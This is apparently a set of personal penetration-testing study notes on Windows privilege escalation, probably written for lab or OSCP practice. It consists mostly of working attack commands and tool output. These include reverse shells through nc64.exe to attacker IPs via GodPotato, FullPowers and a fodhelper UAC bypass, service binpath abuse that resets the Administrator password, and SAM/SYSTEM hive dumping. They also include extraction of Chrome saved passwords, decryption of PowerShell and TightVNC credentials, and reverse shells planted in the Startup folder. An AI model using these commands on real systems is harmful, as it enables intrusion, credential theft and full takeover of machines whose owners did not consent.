sudo psexec.py megabank.local/[email protected]

Local Service or Network Service Group

Normally since we now have access to the LOCAL SERVICE account, we should theoretically have the SeImpersonatePrivilege and SeAssignPrimaryToken privileges. This would grant us the ability to perform auth coercion to SYSTEM via a malicious named pipe. But sometimes if we did not have these privileges we can restore them by using FullPowers.exe tool . The key here the author notice when creating a scheduled task, the new process created by the Task Scheduler Service has all the default privileges of the associated user account (except SeImpersonate). Therefore, with some token manipulations, you can spawn a new process with all the missing privileges.

Checking if we have local service privileges

C:\xampp\htdocs>whoami  
nt authority\local service

using fullPower.exe

#download file
iwr http://10.8.0.210/FullPowers.exe -outfile FullPowers.exe  

#usage 1: spawn a new cmd as localsystem user
.\FullPowers.exe
[+] Successfully created scheduled task. PID=9976
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>


#usage 2
./FullPowers.exe -c "C:\temp\nc64.exe 10.8.0.210 443 -e cmd" -z   
[+] Started dummy thread with id 3704  
[+] Successfully created scheduled task.  
[+] Got new token! Privilege count: 7  
[+] CreateProcessAsUser() OK

No we can abuse the SeImpersonatePrivilege using GP https://github.com/BeichenDream/GodPotato/releases. First let’s start a netcat listener then run the following command

.\godpotato.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.0.210 443"  
 
[*] CombaseModule: 0x140719151316992  
[*] DispatchTable: 0x140719153908040  
[*] UseProtseqFunction: 0x140719153202512  
[*] UseProtseqFunctionParamCount: 6  
[*] HookRPC  
[*] Start PipeServer  
[*] CreateNamedPipe \\.\pipe\1b0ba6f7-8e06-410f-8a43-28aa0ef32cba\pipe\epmapper  
[*] Trigger RPCSS  
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046  
[*] DCOM obj IPID: 00005402-13a4-ffff-3ceb-87cca0c5c52b  
[*] DCOM obj OXID: 0xd3f11f2e3a039eb6  
[*] DCOM obj OID: 0xe1ff42788f3c2c30  
[*] DCOM obj Flags: 0x281  
[*] DCOM obj PublicRefs: 0x0  
[*] Marshal Object bytes len: 100  
[*] UnMarshal Object  
[*] Pipe Connected!  
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE  
[*] CurrentsImpersonationLevel: Impersonation  
[*] Start Search System Token  
[*] PID : 896 Token:0x736  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation  
[*] Find System Token : True  
[*] UnmarshalObject: 0x80070776  
[*] CurrentUser: NT AUTHORITY\SYSTEM  
[*] process start with pid 4184

Server Operators

It is a very highly privileged group that can log in locally to servers, including Domain Controllers. Membership of this group confers the powerful SeBackupPrivilege and SeRestorePrivilege privileges and the ability to control local services.

sc.exe config browser binpath="C:\Windows\System32\cmd.exe /c net user Administrator Password1"
[SC] ChangeServiceConfig SUCCESS

sc.exe qc browser
sc.exe stop browser
sc.exe start browser

All Dumping technique

1-dumping sam/system/security from register

reg save hklm\sam C:\sam
reg save hklm\SYSTEM C:\system

2-dumping sam and system locally

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

3-Memory for a process

procdump.exe -accepteula -ma <proc_name_tasklist>

Monitoring process each 30s

Get-Process backup -ErrorAction SilentlyContinue | Watch-Command -Difference -Continuous -Seconds 30

Kernel Exploit

systeminfo > sysinfo.txt

#check the last KB in search if there is any exploits
wmic qfe list

using autoSuggester

git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
pip2 install xlrd==1.2.0

python2.7 windows-exploit-suggester.py --update

python2.7 windows-exploit-suggester.py --database ./2024-08-05-mssb.xls --systeminfo sysinfo.txt

usig weston

git clone https://github.com/bitsadmin/wesng --depth 1
 
#i used this one
python /opt/wesng/wes.py ./systeminof.txt -i 'Elevation of Privilege' --exploits o

using suggester

windows-exploit-suggester.py  --database /home/kali/Desktop/oscp/Lab-Challengs/challenge_4/OSCP_A/Hermes/exploit/Windows-Exploit-Suggester/2024-08-05-mssb.xls --systeminfo

Decrypting PowerShell Credentials

If we have gained command execution in the context of this user or can abuse DPAPI, then we can recover the cleartext credentials from encrypted.xml. The example below assumes the former.

PS C:\htb> $credential = Import-Clixml -Path 'C:\scripts\pass.xml'
PS C:\htb> $credential.GetNetworkCredential().username

bob


PS C:\htb> $credential.GetNetworkCredential().password

Str0ng3ncryptedP@ss!

Browser Credentials

SharpChrome

PS C:\htb> .\SharpChrome.exe logins /unprotect

  __                 _
 (_  |_   _. ._ ._  /  |_  ._ _  ._ _   _
 __) | | (_| |  |_) \_ | | | (_) | | | (/_
                |
  v1.7.0


[*] Action: Chrome Saved Logins Triage

[*] Triaging Chrome Logins for current user



[*] AES state key file : C:\Users\bob\AppData\Local\Google\Chrome\User Data\Local State
[*] AES state key      : 5A2BF178278C85E70F63C4CC6593C24D61C9E2D38683146F6201B32D5B767CA0


--- Chrome Credential (Path: C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data) ---

file_path,signon_realm,origin_url,date_created,times_used,username,password
C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://vc01.inlanefreight.local/,https://vc01.inlanefreight.local/ui,4/12/2021 5:16:52 PM,13262735812597100,[email protected],Welcome**

Bypassing Restriction

bypass UAC

1-UACME

akagi64.exe [method] (optional=exe to be run or by default cmd.exe)
akagi64.exe 61 "c:\windows\system32\charmap.exe"

2-fodhelper

New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force  
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force  
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\Users\admin\Desktop\nc.exe 10.8.0.136 2222 -e powershell.exe" -Force  
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

powershell bypass restriction

Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
Get-ExecutionPolicy -Scope CurrentUser

Dump process for passwords

# Looking for Firefox
Get-Process
./procdump64.exe -ma $PID-FF
Select-String -Path .\*.dmp -Pattern 'password' > 1.txt
type 1.txt | findstr /s /i "admin"

TightVNC

The registry file found contains a Password attribute, with the corresponding value consisting of hexadecimal characters.

#support this is the password we found
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f

#we need now to dectrypt it using metasploit
msfconsole 
msf5 > irb key="\x17\x52\x6b\x06\x23\x4e\x58\x07" 
require 'rex/proto/rfb' 
Rex::Proto::RFB::Cipher.decrypt ["6BCF2A4B6E5ACA0F"].pack('H*'), key

Decrypting PowerShell Credentials

If we have gained command execution in the context of this user or can abuse DPAPI, then we can recover the cleartext credentials from encrypted.xml. The example below assumes the former.

Method 1

PS C:\htb> $credential = Import-Clixml -Path 'C:\scripts\pass.xml'
PS C:\htb> $credential.GetNetworkCredential().username

bob


PS C:\htb> $credential.GetNetworkCredential().password

Str0ng3ncryptedP@ss!

Method 2

$user = "Administrator"  
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString  
cred = New-Object System.Management.Automation.PSCredential($user, $pass)  
$cred.GetNetworkCredential() | Format-List

Symbolink link abuse

#usage: "mklink /J [directory we want to link should not exist] [destination]"
cmd /c "mklink /J C:\Users\upload C:\xampp\htdocs"

Spawn Shell as Administrator

Invoke-RunasCs -Username Administrator -Password trustno1 -Command ./shell.exe

#PsExec
.\PsExec64.exe -accepteula -i -s "c:\shell.exe"

#winexec in linux
winexe -U 'admin%Password123' //192.168.45.16 cmd.exe
#spawn shell as system
winexe -U 'admin%Password123' --system //192.168.45.16 cmd.exe

Insecure GUI Apps

check running process permissions

tasklist /V | findstr mspaint.exe

abuse app GUI by running cmd

open cmd here

Startup Apps

each user can define apps that start when they log in by placing shortcuts to the in specific directory Windows also has a startup directory for apps that should start for all users: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ if we create a file in this directory, we can use our revershell executable and escalate privileges when an admin login

using accesschck to check permission over this directory

accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

create a shortcut

powershell "$s=(New-Object -COMObject WScript.Shell).CreateShortcut('c:\test\test.lnk'); $s.TargetPath='c:\users\test\desktop\test.exe'; $s.Save()"

Installed Software Exploit

tasklist /V

#using seatbelt to search for non standard process
.\seatbelt.exe NonstanddardProcesses

#using winpeas 
winPeas.exe quit processinfo

PreviousLinuxNextPayloads (Reverse shell)

Last updated

Was this helpful?